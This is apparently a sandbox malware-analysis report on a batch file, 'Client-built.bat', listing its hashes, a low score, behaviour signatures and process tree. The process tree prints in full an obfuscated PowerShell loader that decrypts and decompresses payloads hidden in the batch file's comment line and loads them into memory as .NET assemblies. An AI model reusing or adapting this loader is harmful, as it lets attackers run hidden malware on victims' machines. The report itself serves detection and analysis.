Resubmissions
Analysis
-
max time kernel
41s -
max time network
15s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
14-04-2024 15:44
Static task
static1
Behavioral task
behavioral1
Sample
Client-built.bat
Resource
win7-20240319-en
3 signatures
60 seconds
General
-
Target
Client-built.bat
-
Size
1.6MB
-
MD5
566c653ae6a704041aef596fce6d6a8c
-
SHA1
da35608bf372a6113d941817a96bc3a17de9ef69
-
SHA256
950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
-
SHA512
98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2
-
SSDEEP
24576:5fdhc8KmdqCxAN6Wzmom6E7SMVePybPyDJq2Tg60xTmDADhXX9wEvIslVYglu0TW:5FhcZmgs4DANHXvhXNVnEyx8f
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2300 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1620 wrote to memory of 2300 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 2300 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 2300 1620 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300